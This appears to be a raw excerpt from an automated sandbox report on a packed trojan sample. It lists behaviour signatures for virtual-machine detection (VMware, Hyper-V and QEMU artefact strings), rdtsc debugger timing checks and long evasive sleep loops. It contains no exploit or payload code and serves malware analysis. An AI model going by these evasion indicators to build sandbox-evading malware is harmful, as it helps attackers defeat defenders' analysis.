Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D1CC0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D1DC0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32C600000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32C720000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32C820000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32CBD0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32CF00000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32D800000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32D550000 memory commit | memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Windows\explorer.exe File opened / queried: scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 5832 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 6856 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 6856 Thread sleep count: 120 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 6376 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 4820 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe TID: 2088 Thread sleep time: -85000s >= -30000s Jump to behavior
Source: explorer.exe, 00000010.00000003.900881622.000000000F25D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B1
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: vmware horizon clientator xmplayerrizon c
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: VMware
Source: explorer.exe, 00000010.00000002.1026871359.0000000000DEE000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000002.1046519388.000000000621D000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: cmd.txtQEMUqemu
Source: explorer.exe, 00000002.00000000.703940604.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: 7585*|voice & video calls*|skype1*|voice recorder*|vioce6945*|vmware player*|vmplayer4486*|voice recorder*|voive7212*|voice recorder*|recr7315*|trader workstation*|tws1*|vuze*|azu5812*|weather*|local weather6239*|virusscan console*|mc581*|tools command prompt*|cmd1*|visiontools pro-e*|vt431*|twitter*|twiter5581*|weather*|the weather6785*|visual studio 2013*|v
Source: explorer.exe, 00000010.00000003.907549674.000000000F48E000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c9t
Source: explorer.exe, 00000010.00000003.887959259.00000000063B1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmsrvc
Source: explorer.exe, 00000002.00000000.695416216.0000000004755000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000002.00000000.704041361.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000010.00000003.902544793.00000000063F7000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B@c
Source: explorer.exe, 00000002.00000000.704088912.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe11333
Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
Source: explorer.exe, 00000010.00000003.902602832.000000000F48D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BW
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: *|vmware player*|vmplayer4486
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000010.00000003.831423585.00000000062FE000.00000004.00000001.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000010.00000002.1047169993.000000000637F000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000002.1046519388.000000000621D000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}@
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: virusscan consolemberswill it rain todaytr consolevmware workstation 12 playerhrewcess manag
Source: SearchUI.exe, 00000016.00000002.893292909.000001B0CAFC5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW@b;
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmtools
Source: explorer.exe, 00000010.00000003.908089865.000000000EEB2000.00000004.00000001.sdmp Binary or memory string: }#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZZ[
Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
Source: explorer.exe, 00000010.00000003.900881622.000000000F25D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B<
Source: explorer.exe, 00000010.00000003.902621050.000000000F492000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000010.00000003.905324815.000000000EEB2000.00000004.00000001.sdmp Binary or memory string: }#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: vmware horizon client
Source: SearchUI.exe, 00000016.00000003.843512340.000001B8E45F7000.00000004.00000001.sdmp Binary or memory string: *|hyper-v manager*|hyper v4225
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmware svga
Source: explorer.exe, 00000010.00000003.902544793.00000000063F7000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B5b
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}`
Source: explorer.exe, 00000010.00000003.902602832.000000000F48D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bm
Source: explorer.exe, 00000010.00000003.903702476.000000000EEB1000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}`p.
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: vmware workstation 12 player
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: explorer.exe, 00000010.00000003.901951610.0000000006454000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: VMware.Horizon.Client9116
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: virtual-vmware pointing device
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe7674
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000!O
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: VMware.Workstation.vmui7347
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: vmware vsphere clientator x
Source: explorer.exe, 00000002.00000000.704041361.000000000A716000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&^
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe11073
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: vmware vsphere client
Source: explorer.exe, 00000002.00000000.700277860.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: VMware.Workstation.vmplayer7859
Source: explorer.exe, 00000010.00000002.1046776940.000000000626D000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000010.00000003.882389201.000000000F59B000.00000004.00000001.sdmp Binary or memory string: 9Tm\Device\HarddiskVolume2\??\Volume{ef47ea26-ec76-4a6e-8680-9e53b539546d}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
